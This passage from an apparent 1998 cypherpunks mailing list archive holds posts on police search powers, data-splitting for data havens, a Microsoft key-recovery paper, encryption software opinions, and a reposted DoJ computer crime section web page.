     4.   Returning Seized Computers and Materials
          a.   Federal Rules of Criminal Procedure:  Rule 41(e)
          b.   Hardware
          c.   Documentation
          d.   Notes and Papers
          e.   Third-Party Owners


   VIII.  EVIDENCE
A.   INTRODUCTION
B.   THE BEST EVIDENCE RULE
C.   AUTHENTICATING ELECTRONIC DOCUMENTS
     1.   "Distinctive" Evidence
     2.   Chain of Custody
     3.   Electronic Processing of Evidence
D.   THE HEARSAY RULE


   IX.  APPENDICES
APPENDIX A:   SAMPLE COMPUTER LANGUAGE FOR SEARCH WARRANTS
     1.   Tangible Objects
          a.   Justify Seizing the Objects
          b.   List and Describe the Objects
               (1)   Hardware
               (2)   Software
               (3)   Documentation
               (4)   Passwords and Data Security Devices
     2.   Information:  Records, Documents, Data
          a.   Describe the Content of Records, Documents,
               or other Information
          b.   Describe the Form which the Relevant Information
               May Take
          c.   Electronic Mail:  Searching and Seizing Data
               from a BBS Server under 18 U.S.C.  2703
               (1)   If All the E-Mail is Evidence of Crime
               (2)   If Some of the E-Mail is Evidence of Crime
               (3)   If None of the E-Mail is Evidence of Crime
          d.   Ask Permission to Seize Storage Devices when
               Off-Site Search is Necessary
          e.   Ask Permission to Seize, Use, and Return
               Auxiliary Items, as Necessary
          f.   Data Analysis Techniques
     3.   Stipulation for Returning Original Electronic Data

  APPENDIX B:   GLOSSARY
  APPENDIX C:   FEDERAL EXPERTS FOR COMPUTER CRIME INVESTIGATIONS
  APPENDIX D:   COMPUTER SEARCH AND SEIZURE WORKING GROUP
  APPENDIX E:   STATUTORY POPULAR NAME TABLE
  APPENDIX F:   TABLE OF AUTHORITIES
                Cases 
                Statutes 
                Federal Rules 
                Federal Regulations  
                Legislative History  
                Reference Materials  



   
   
   Go to . . . CCIPS Home || Justice Home Page
     _________________________________________________________________
   
   
    Updated page May 9 , 1997
    usdoj-jmd/irm/css/mlb
    
   
     _________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 23 Jan 1998 10:48:45 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: On the LAM--Local Area Mixes (fwd)
Message-ID: <199801230244.UAA11653@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 22 Jan 1998 21:29:55 -0500 (EST)
> From: Ryan Anderson <ryan@michonline.com>
> Subject: Re: On the LAM--Local Area Mixes (fwd)

> On Thu, 22 Jan 1998, Jim Choate wrote:
> 
> > Are police considered an extension of the judicial or the executive arm of
> > the government?
> 
> In theory, executive.  (That way legislative writes laws, executive
> decides if they want to enforce them, judicial decides if they're legal or
> not.. )  In theory, of course..

First, I knew the answer, I was looking for a lead-in...thanks.

Then how, Constitutionaly speaking, do they have get the responsbility to
search when it is clearly a judicial responsibility (that is where it is
in the Constitution) and in cases such as Evans -v- Gore the Supreme Court
has found that the judicial body can't transfer or relinquish it's
responsibilities even if it *wants* to?

I suspect that, again Constitutionaly speaking, the only system that would
pass strict muster would be something similar to the Dutch which prohibit
the police from executing a search until *after* review by a legislative
representative.

This is a rhetorical question, I don't expect you or anyone else to
respond to it. Just think about it...


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John M" <estoy@hotmail.com>
Date: Fri, 23 Jan 1998 13:30:14 +0800
To: cypherpunks@toad.com
Subject: How to eliminate liability?
Message-ID: <19980123052334.20406.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



This is just an idea I thought I would throw out and see what happens.  
There has been considerable discussion recently about datahavens, how no 
one physical location in meatspace is safe, and how there is no single 
place on earth that a datahaven could exist that would accept all kinds 
of information.

Well, what about spreading the information out?  Something simple like 
doing a matrix rotation on the scrambled data in 8 byte blocks and 
splice it by bit to split the data up, add ECC (error correction code) 
to it, and spread it to several servers.  This way no one server has all 
the information necessary to recreate the "offending" information and if 
one server gets "hit" (killed), the information can still be regenerated 
from the the information and ECC from the other servers.

The bit splitting I'm talking about would go something like this.  The 
data would be set up in clusters of eight bytes and then these eight 
bytes would be rotated, error correction applied, divided byte by byte 
to separate queues (for separate destinations), resequenced to include 
the ECC overhead, and sent on it's merry way.

Original encrypted information:

Cluster A               Cluster B...
Byte 1: 01001011
Byte 2: 10101110
Byte 3: 10010110
Byte 4: 10110111
Byte 5: 01011100
Byte 6: 10111011
Byte 7: 10001101
Byte 8: 00110110

After the matrix rotate:

Cluster A               Cluster B...
Byte 1: 01110110
Byte 2: 10001000
Byte 3: 01010101
Byte 4: 00111101
Byte 5: 11001110
Byte 6: 01111011
Byte 7: 11110101
Byte 8: 10010110


Add ECC:

Cluster A               Cluster B...
Byte 1:   01110110 1
Byte 2:   10001000 0
Byte 3:   01010101 0
Byte 4:   00111101 1
Byte 5:   11001110 1
Byte 6:   01111011 0
Byte 7:   11110101 0
Byte 8:   10010110 0

ECC byte: 01000000 0


Divided up:

Cluster A         ECC-A  Cluster B ECC-B
Byte 1: 01110110  1      10100011  0

Resequenced into separate queues by byte in cluster:

01110110 11010001 10......

...and distributed to the servers.


These are just my ramblings, I'm not a programmer (or at least I haven't 
been for a long time).  Nor do I claim to know if this form of 
distribution will escape the legal issues of storing certain data on on 
servers in specific areas of meatspace (I'm no lawyer (kill the 
lawyers)).  At the very least, it seems that this scheme (or something 
like it, if this form of ECC is not sufficient) could be used to keep 
data from being lost if one or more servers gets whacked by armed forces 
or a nuclear bomb.  I'm not even going to think about how this data 
could be distributed.  You guys can do that...

Feedback and flames welcome.

John

estoy@hotmail.com



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 23 Jan 1998 11:29:56 +0800
To: coderpunks@toad.com
Subject: Re: [Long] How to recover private keys for various Microsoft products
In-Reply-To: <88531016604880@cs26.cs.auckland.ac.nz>
Message-ID: <3.0.3.32.19980122212421.006de5b0@schloss.li>
MIME-Version: 1.0
Content-Type: text/plain



At 04:29 AM 1/21/98, Peter Gutmann wrote:
>    How to recover private keys for Microsoft Internet Explorer, Internet
>            Information Server, Outlook Express, and many others
>                                      - or -
>                 Where do your encryption keys want to go today?
> 
>                    Peter Gutmann, <pgut001@cs.auckland.ac.nz>

Has anyone done a real world implementation of this exploit?

Mr. Gutmann's mscrack.c seems to compile fine, but fails self tests on
internal rc2 or sha-1.  Just me?

Anyone?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Fri, 23 Jan 1998 10:36:32 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: On the LAM--Local Area Mixes (fwd)
In-Reply-To: <199801221953.NAA09086@einstein.ssz.com>
Message-ID: <Pine.GSO.3.95.980122212745.28558A-100000@king>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 22 Jan 1998, Jim Choate wrote:

> Are police considered an extension of the judicial or the executive arm of
> the government?

In theory, executive.  (That way legislative writes laws, executive
decides if they want to enforce them, judicial decides if they're legal or
not.. )  In theory, of course..

Ryan Anderson - Alpha Geek
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 23 Jan 1998 12:31:17 +0800
To: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Subject: Re: FW: Symantec Norton, Your Eyes Only.
In-Reply-To: <01ISPY42BHTU00B7O0@hmgwy1.isd.tafensw.edu.au>
Message-ID: <199801230430.XAA07081@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <01ISPY42BHTU00B7O0@hmgwy1.isd.tafensw.edu.au>, on 01/23/98 
   at 02:56 PM, Pearson Shane <Shane.Pearson@tafensw.edu.au> said:

>Anyone?

>> -----Original Message-----
>> From:	Pearson Shane 
>> Sent:	Thursday, January 15, 1998 1:25 PM
>> To:	'cypherpunks@toad.com'
>> Subject:	Symantec Norton, Your Eyes Only.
>> 
>> 
>> Hey all,
>> 
>> Just wondering what people think of this product?
>> Good, bad or ugly?
>> 
>> Is there an international version and a US version?
>> 
>> If so, what limitations are in the international version?
>> 
>> Many thanks...


Is source code available for peer review? NO

Is it US Commercial software? YES

I wouldn't use it to secure an outhouse. No source no trust.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: If at first you don't succeed, work for Microsoft.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMgK6Y9Co1n+aLhhAQF08wP/abLg8ftPY7nuJ1hp8OKi6Ik2lx7A70/3
0GU++TZAmLWJ4XKlgCiujm0Z06P3rSEf+qtiIOTfFKUaN4kvt9JlmkH6h8fmuAJf
t48Cq5XQbeYDMJ6HjvGpPraZJd5zmqv54UQuUjswZBONNIMqt+ypy6id/hpe0BY9
mOg9VyMW1cM=
=aNiz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 23 Jan 1998 12:27:41 +0800
To: redgod@usa.net
Subject: Re: (eternity) Service denial attacks on Eternity
In-Reply-To: <3.0.32.19980123104841.007a8bf0@iuol.cn.net>
Message-ID: <199801230435.XAA07128@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.32.19980123104841.007a8bf0@iuol.cn.net>, on 01/23/98 
   at 10:50 AM, redgod@usa.net said:

>FUCK!
>WHO REGISTER ME TO THIS MAILING LIST?
>CAN YOU TELL ME HOW TO REMOVE MYSELF FROM IT?
>I WILL MAD!
>OH GOD! TOO MANY EMAIL!


Welcome to CyberHell(TM) there is no escape, you are doomed here for all
eternity.

Kick back, crack open a cold one and enjoy the ride, you ain't going
nowhere. 

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: If you want it done right, forget Microsoft.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMgMKI9Co1n+aLhhAQFRpQP9FEu4wSZ4GT/oDKYS2RkkDT26+RDcWwqz
acFwbPjJ9kuOvBswhWuF0zUYdA0BwVDtYXaxTYGIyW//1DWFwL47cC0NtibSGHFU
E61R5RzthL06ug8J3h02q2CsoYGAgP4YMF2QnzqBLsQDdlaGUzUt7+Kvplc59MW9
p0q3rdYZdMI=
=MM8h
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 23 Jan 1998 11:47:59 +0800
To: cypherpunks@cyberpass.net
Subject: Supplement to DoJ Seizure Guide
Message-ID: <1.5.4.32.19980123034549.006f3954@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



There's a long October 1997 supplement to the 1994 DoJ 
Guide to Search and Seizure of Computers for which Jim 
Choate posted the TOC just now. It reflects recent campaigns, 
raids and counterattacks as the battle for supremacy between 
law and technology intensifies and both sides search and
seize each's best and worst:

   http://jya.com/doj-ssgsup.htm  (100K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Fri, 23 Jan 1998 07:13:59 +0800
To: cypherpunks@toad.com
Subject: Re: Other c'punk lists?
In-Reply-To: <964b42d2ad6119da33ff9f4184394baf@anon.efga.org>
Message-ID: <19980122225207.28429.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 21 Jan 1998 10:20:16 -0800  Bill Stewart <bill.stewart@pobox.com> wrote:

\/ ---snip loads of good info---
00

I heard there is also

CYPHERLIST-WATCH-DIGEST-HELP@JOSHUA.RIVERTOWN.NET

looks pretty good!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Fri, 23 Jan 1998 07:12:08 +0800
To: cypherpunks@toad.com
Subject: Re: Other c'punk lists?
In-Reply-To: <964b42d2ad6119da33ff9f4184394baf@anon.efga.org>
Message-ID: <19980122225315.28507.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 21 Jan 1998 10:20:16 -0800  Bill Stewart <bill.stewart@pobox.com> wrote:

\/ ---snip loads of good info---
00

I heard there is also

CYPHERLIST-WATCH-DIGEST-HELP@JOSHUA.RIVERTOWN.NET

looks pretty good!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 23 Jan 1998 13:39:29 +0800
To: cypherpunks@ssz.com
Subject: http:--www.usdoj.gov-criminal-cybercrime-
Message-ID: <199801230455.WAA12772@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



   
   
Computer Crime and Intellectual Property Section
(CCIPS) 

     
     
     202-514-1026
     Fax 202-514-6113
     
   
   
     The CCIPS is responsible for implementing the Justice Department's
     Computer Crime Initiative, a comprehensive program designed to
     address the growing global computer crime problem. Section attorneys
     are actively working with other government officials (e.g., the FBI,
     Department of Defense, NASA) the private sector (including hardware
     and software vendors and telecommunications companies), academic
     institutions, and foreign representatives to develop a global
     response to cyberattacks. These attorneys, who are responsible for
     resolving unique issues raised by emerging computer and
     telecommunications technologies, litigate cases, provide litigation
     support to other prosecutors, train federal law enforcement
     personnel, comment upon and propose legislation, and coordinate
     international efforts to combat computer crime.
     
   
   
   
     _________________________________________________________________
   
   
   
   Information is available via this web site about the following topics:
   
   
     I. COMPUTER FRAUD AND ABUSE
    1. The National Information Infrastructure Protection Act of 1996 
       
     II. SEARCHING AND SEIZING COMPUTERS
    1. Federal Guidelines for Searching and Seizing Computers
    2. Supplement to Federal Guidelines for Searching and Seizing
       Computers
       
     III. PROTECTING INTELLECTUAL PROPERTY RIGHTS :
     
     Copyrights, Trademarks and Trade Secrets
    1. Federal Guidelines for Prosecution of Violations of Intellectual
       Property Rights 
    2. Operation "Counter Copy" 
    3. "No Electronic Theft ('NET') Act"
    4. The Economic Espionage Act
       
   IV. ENCRYPTION AND COMPUTER CRIME
    1. Letter from Attorney General Janet Reno and others to Members of
       Congress regarding law enforcement's concerns related to
       encryption
    2. Testimony of Deputy Assistant Attorney General Robert S. Litt,
       Before the Subcommittee on Telecommunications, Trade and Consumer
       Protection, of the House Commerce Committee on September 4, 1997 
       
   
   
   V. INTERNATIONAL ASPECTS OF COMPUTER CRIME
    1. Attorney General Janet Reno's Speech to Senior Experts
       Representing the G-7 on January 21, 1997 
    2. Council of Europe Recommendation 95(13)
       
   
   
   VI. LAW ENFORCEMENT COORDINATION FOR HIGH-TECH CRIMES
    1. Computer-Telecommunications Coordinator ("CTC") Program
       
   VII. PRIVACY ISSUES IN THE HIGH-TECH CONTEXT
    1. Law Enforcement Concerns Related to Computerized Data Bases
       
   
   
   Enforcing the Criminal Wiretap Statute
   
   Other Relevant Links 
   



   
   
   
     _________________________________________________________________
   
  I. COMPUTER FRAUD AND ABUSE
  
   
     _________________________________________________________________
   
   
   
   A. The National Information Infrascructure Protection Act of 1996 
   
     
     
     In October 1996, the National Information Infrastructure Protection
     Act of 1996 was enacted as part of Public Law 104-294. It amended
     the Computer Fraud and Abuse Act, which is codified at 18 U.S.C. 
     1030. Below you will find links to the amended version of 18 U.S.C.
      1030, as well as a legislative analysis, prepared by attorneys
     from the Computer Crime and Intellectual Property Section.
     
     * Legislative Analysis
     * 18 U.S.C. 1030 Amended
       
   
   
   B. Other Relevant Web Sites
   



   
   
   
     _________________________________________________________________
   
  II. SEARCHING AND SEIZING COMPUTERS
  
   
     _________________________________________________________________
   
   
   
   A. Federal Guidelines for Searching and Seizing Computers
   
     The process of Searching and Seizing Computers raises unique issues
     for law enforcement personnel. The Federal Guidelines for searching
     and seizing computers illustrate some of the ways in which search a
     computer is different from searching a desk, a file cabinet, or an
     automobile.
     
     * Introductory Remarks
     * FEDERAL GUIDELINES - Table of Contents
     * Download the Zipped WordPerfect file [138K].
       
   
   
   B. Supplement to Federal Guidelines for Searching and Seizing
   Computers
   
     In October 1997, the Computer Crime and Intellectual Property
     Section published a Supplement to Federal Guidelines for Searching
     and Seizing Computers. This Supplement is intended to update the
     Federal Guidelines for Searching and Seizing Computers that had been
     published in July 1994. The Supplement describes relevant federal
     cases decided since July 1994 as well as a number of additional
     earlier decisions. The Supplement also describes relevant state
     cases, which had not been incorporated in the original Guidelines.
     The cases in this Supplement are organized according to the sections
     in the Guidelines.
     
     
   
   Supplement to Federal Guidelines for Searching and Seizing Computers
   Preface to Supplement to Federal Guidelines for Searching and Seizing
       Computers
   Supplement to Federal Guidelines for Searching and Seizing Computers -
       Table of Contents
   Download the Zipped WordPerfect 6.1 file [231k]
       
   
   
   C. Other Relevant Web Sites
   



   
   
   
     _________________________________________________________________
   
  III. PROTECTING INTELLECTUAL PROPERTY RIGHTS :
  Copyrights, Trademarks and Trade Secrets
  
   
     _________________________________________________________________
   
   
   
   A. Federal Guidelines for Prosecution of Violations of Intellectual
   Property Rights
   (Copyrights, Trademarks and Trade Secrets)
   
     
     
     The importance of the protection of intellectual property to the
     economic well-being and security of the United States cannot be
     overestimated. The Computer Crime and Intellectual Property Section
     wrote the attached manual to assist law enforcement in the
     investigation and prosecution of violations of federal criminal
     copyright, trademark, and trade secret laws. Section I of the manual
     contains an overview of the protection of intellectual property, and
     discusses the basic scope of copyright, trademark, and trade secret
     and patent law. Section II focuses on intellectual property entitled
     to copyright protection and Section III describes the applicability
     of various federal criminal statutes to copyright infringement.
     Section IV addresses the prosecution for trafficking in counterfeit
     goods under 18 U.S.C.  2320. Section V discusses the prosecution of
     trade secret thefts and analyzes the recently enacted Economic
     Espionage Act of 1996. Finally, Section VI contains a list of
     contact persons, model indictments, search warrant affidavits, jury
     instructions, state criminal trade secret statutes, and the
     legislative history of the Copyright Felony Act and the Economic
     Espionage Act of 1996.
     
     * Table of Contents
     * Download the Manual Zipped WordPerfect file [###K].
       
   B. Operation "Counter Copy" 
   
     
     
     In early May, the Department of Justice and the Federal Bureau of
     Investigation released the first results of a nationwide law
     enforcement effort to crack down on trademark and copyright fraud,
     which is estimated to cost American businesses millions of dollars
     each year and cheat unsuspecting consumers who purchase counterfeit
     products. As a result of the joint effort, called Operation "Counter
     Copy," 35 indictments were returned since the beginning of April for
     copyright or trademark infringement. More information about
     Operation Counter Copy, including a press release and brief
     summaries of the cases, are available via the links below.
     
     * Summaries of Cases
     * FBI page - Counter Copy Cases
     * Press Release
       
   
   
   
   
   " C. No Electronic Theft ('NET') Act"
   
   
   
     Computers are changing the way that copyrighted goods are being
     illegally copied and distributed, creating new challenges for
     copyright owners and for law enforcement.
     
     
   
     * The Statement of Kevin V. DiGregrory,
       
    Deputy Assistant Attorney General of the Criminal Division before the
   Subcommittee on Courts and Intellectual Property of the House
   Committee on the Judiciary, presented September 11, 1997, describes
   how law enforcement is addressing this challenge and expresses the
   Department's support for the goals of H.R. 2265, The "No Electronic
   Theft ('NET') Act."
   
   A one page Summary of Statement is also available.
   
   
   
   D. The Economic Espionage Act
   
     The Computer Crime and Intellectual Property Section is also charged
     with evaluating all requests for approval of charges under the
     Economic Espionage Act and making a recommendation regarding the
     approval of such requests to the Attorney General, Deputy Attorney
     General, or Assistant Attorney General. In addition, the Section
     also prosecutes certain Economic Espionage cases directly.
     
     Four Pillars Case
     
     One well-publicized case currently being prosecuted by the Section
     involves the alleged theft of trade secrets by the Four Pillars
     Enterprise Company, LTD, of Taiwan from an American corporation.
     Press releases relating to that case can be found below.
   
     * Press Release: Taiwanese businessman and daughter arrested on
       industrial espionage charges (September 5, 1997)
       
       
   Press Release: Taiwanese firm, its President and his daughter indicted
       in industrial espionage case; Third individual charged in Ohio
       case (October 1, 1997)
       
   E. Other Relevant Web Sites
   



   
     _________________________________________________________________
   
  IV. ENCRYPTION AND COMPUTER CRIME
  
   
     _________________________________________________________________
   
   
   
     The nation's policy on encryption must carefully balance important
     competing interests. The Department of Justice has a vital stake in
     the country's encryption policy because encryption may be used not
     only to protect lawful data against unauthorized intruders, it may
     also be used to conceal illegitimate materials from law enforcement.
     While we support the spread of strong encryption, we believe that
     the widespread dissemination of unbreakable encryption without any
     accommodation for law enforcement access is a serious threat to
     public safety and to the integrity of America's commercial
     infrastructure. Our goal is to encourage the use of strong
     encryption to protect privacy and commerce, but in a way that
     preserves (without extending) law enforcement's ability to protect
     public safety and national security. Accordingly, the Administration
     has promoted the manufacture and use of key recovery products, aided
     the development of a global key management infrastructure ("KMI"),
     and liberalized United States restrictions on the export of robust
     cryptographic products. We anticipate that market forces will make
     key recovery products a de facto industry standard and thus preserve
     the balance of privacy and public safety that our Constitution
     embodies.
     
    A. Letter from Attorney General Janet Reno and others to Members of
   Congress regarding law enforcement's concerns related to encryption
   
     On July 18, 1997, Attorney General Janet Reno and others sent a
     letter to Members of Congress outlining law enforcement's concerns
     about the public safety and national security threats posed by
     unbridled availability of strong encryption. It urged legislators to
     support a balanced approach that supports commercial and privacy
     interest while maintaining law enforcement's ability to investigate
     and prosecute serious crime. This letter was co-signed by:
     * Louis Freeh, Director, Federal Bureau of Investigation
     * Barry McCaffrey, Director, Office of National Drug Control Policy
     * Thomas A. Constantine, Director, Drug Enforcement Administration,
     * Lewis C. Merletti, Director, United States Secret Service
     * Raymond W. Kelly, Undersecretary for Enforcement, U.S. Department
       of Treasury
     * George J. Weise, Commissioner, United States Customs Service
     * John W. Magaw, Director, Bureau of Alcohol, Tobacco and Firearms
       
     An image of the letter, as signed, as well as the text of the letter
     is available via the links below:
     * Image of letter to Congress regarding encryption as signed 
       
   Text of letter to Congress regarding encryption as signed
   (WordPerfect)
   
   B. Testimony of Robert S. Litt, Deputy Assistant Attorney General,
   before the Subcommittee on Telecommunications, Trade and Consumer
   Protection, of the House Commerce Committee, on September 4, 1997 
   
     Robert S. Litt, Deputy Assistant Attorney General, Criminal
     Division, Department of Justice, testified before the Subcommittee
     on Telecommunications, Trade and Consumer Protection, of the House
     Commerce Committee, on September 4, 1997. His testimony addressed
     encryption and one of the bills proposing to modify the United
     States' regulation of cryptography, H.R. 695. His tesimony, and a
     summary of his testimony, is available via the link below.
     * Summary of Robert Litt's testimony 
       
   before the Subcommittee on Telecommunications, Trade and Consumer
   Protection, of the House Commerce Committee, on September 4, 1997
   
   Robert Litt's testimony before the Subcommittee on Telecommunications,
   Trade and Consumer Protection, of the House Commerce Committee, on
   September 4, 1997 C. Other Relevant Web Sites
   



   
     _________________________________________________________________
   
   
   
  V. INTERNATIONAL ASPECTS OF COMPUTER CRIME
  
   
     _________________________________________________________________
   
   
   
   
   
   With the explosive growth of the Internet worldwide, computer crimes
   increasingly are prone to have international dimensions. Some of the
   challenges faced by law enforcement on the international front
   include: harmonization of countries' criminal laws; locating and
   identifying perpetrators across borders; and securing electronic
   evidence of their crimes so that they may be brought to justice.
   Complex jurisdictional issues arise at each step. The Department of
   Justice is working with foreign governments through many channels to
   address global threats related to computer crime. A. Attorney General
   Janet Reno's speech to Senior Experts representing the G-7 on January
   21, 1997 
   
   On January 21, 1997, Attorney General Janet Reno spoke to Senior
   Experts representing the G-7 group of leading industrialized nations
   (now, with the inclusion of Russia, known as The Eight). The Attorney
   General's speech addressed the challenges presented to law enforcement
   by hightech and computer criminals, and she suggested a number ways in
   which the United States and its allies can respond to this global
   threat. Her speech is available via the link below.
   
     * Janet Reno's speech to Senior Experts representing the G-7 on
       January 21, 1997
       
   
   
   B. Council of Europe Recommendation 95(13)
   
     In September 1995, the Council of Europe adopted eighteen (18)
     recommendations relating to problems of criminal procedural law
     connected with information technology. These recommendations are
     available via the link below.
     * Council of Europe Recommendation 95(13) relating to problems of
       criminal procedural law connected with information technology,
       Sept. 1995
       
   
   
   C. Other Relevant Web Sites
   



   
     _________________________________________________________________
   
   
   
  VI. LAW ENFORCEMENT COORDINATION FOR HIGH-TECH CRIMES
  
   
     _________________________________________________________________
   
   
   
   A. Computer-Telecommunications Coordinator ("CTC") Program
   
     Coordination among prosecutors in high-tech crime cases has improved
     dramatically because of the implementation, since January 1995, of
     the "Computer-Telecommunications Coordinator" ("CTC") program. Under
     the CTC program, each United States Attorney's Office, as well as a
     few other Department entities, has designated at least one Assistant
     U.S. Attorney to serve as a CTC, with a few distinct areas of
     responsibility. To reach a CTC, contact the Computer Crime and
     Intellectual Property Section, or the U.S. Attorney's office in a
     particular district. CTC responsibilities are outlined below.
     
     * CTC responsibilities
       
   
   
   B. Other Relevant Web Sites
   



   
     _________________________________________________________________
   
   
   
  VII. PRIVACY ISSUES IN THE HIGH-TECH CONTEXT
  
   
     _________________________________________________________________
   
   
   
   A. Law Enforcement Concerns Related to Computerized Data Bases
   
     The Computer Crime and Intellectual Property Section of the
     Department of Justice submitted comments in response to the request
     of the Federal Trade Commission ("FTC") for comments on its workshop
     on Consumer Information Privacy and its Data Base Study. The
     Department is deeply concerned about the safety and security of
     American citizens. The Department is vigilant to take appropriate
     measures to guard their privacy while using all the resources at its
     disposal, including information resources, to investigate and
     prosecute violations of the federal criminal law. The comments are
     available via the link below:
     
     * CCIPS comments as submitted to the FTC workshop on Consumer
       Information Privacy and Data Base Study
       
   
   
   
   
   B. Enforcing the Criminal Wiretap Statute
   
     The Computer Crime and Intellectual Property Section helps to
     protect the privacy of Americans by enforcing the criminal wiretap
     statute, 18 U.S.C. 2511. One well-publicized interception involved
     a conference call in which the Speaker of the House Newt Gingrich
     participated. The couple that intercepted the call pleaded guilty on
     April 25, 1997, as is described in the press release below.
     
     * Press release regarding guilty plea for interception of a
       communication 
       
     
     
   C. Other Relevant Web Sites
   



   
   
   Go to . . . Criminal Home Pages || Justice Department Home Pages
     _________________________________________________________________
   
   
    Updated page December 8, 1997
    usdoj-jmd/irm/css/jea
    
   
     _________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Fri, 23 Jan 1998 15:23:42 +0800
To: cypherpunks@cyberpass.net
Subject: Sacremento Sheriff's deputies get M-16's
Message-ID: <3.0.3.32.19980122230006.006bc0dc@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On the news tonight, channel 3 and 31 both featured stories about
Sacramento sheriff deputy supervisors getting "semi-automatic AR-15"
rifles.  It was hilarious.  Channel 3 showed a close-up of the receiver,
which was clearly marked with "M16A1".  I got this funny feeling that them
thar AR-15's will rock 'n roll if the deputy supervisor finds himself in a
North Hollywood style situation...can you say Disinformation, boys and
girls?
-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNMg/88JF0kXqpw3MEQIAigCg/bXFrIS02GRZW65e10uZrh8QGSEAoLv2
2xmcXhKUBvrWN1Lm7CtE1PhQ
=P5v5
-----END PGP SIGNATURE-----


Jonathan Wienke

PGP Key Fingerprints:
7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC

"If ye love wealth greater than liberty, the tranquility of servitude
greater than the animating contest for freedom, go home from us in peace.
We seek not your counsel, nor your arms. Crouch down and lick the hand that
feeds you. May your chains set lightly upon you; and may posterity forget
that ye were our countrymen."
-- Samuel Adams

"Stupidity is the one arena of of human achievement where most people
fulfill their potential."
-- Jonathan Wienke

Never sign a contract that contains the phrase "first-born child."

When the government fears the people there is liberty.
When the people fear the government there is tyranny.
Those who live by the sword get shot by those who don't. 

RSA export-o-matic:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Fri, 23 Jan 1998 07:09:23 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Netscape 5 will be GPL'ed
In-Reply-To: <199801230129.BAA02808@fountainhead.net>
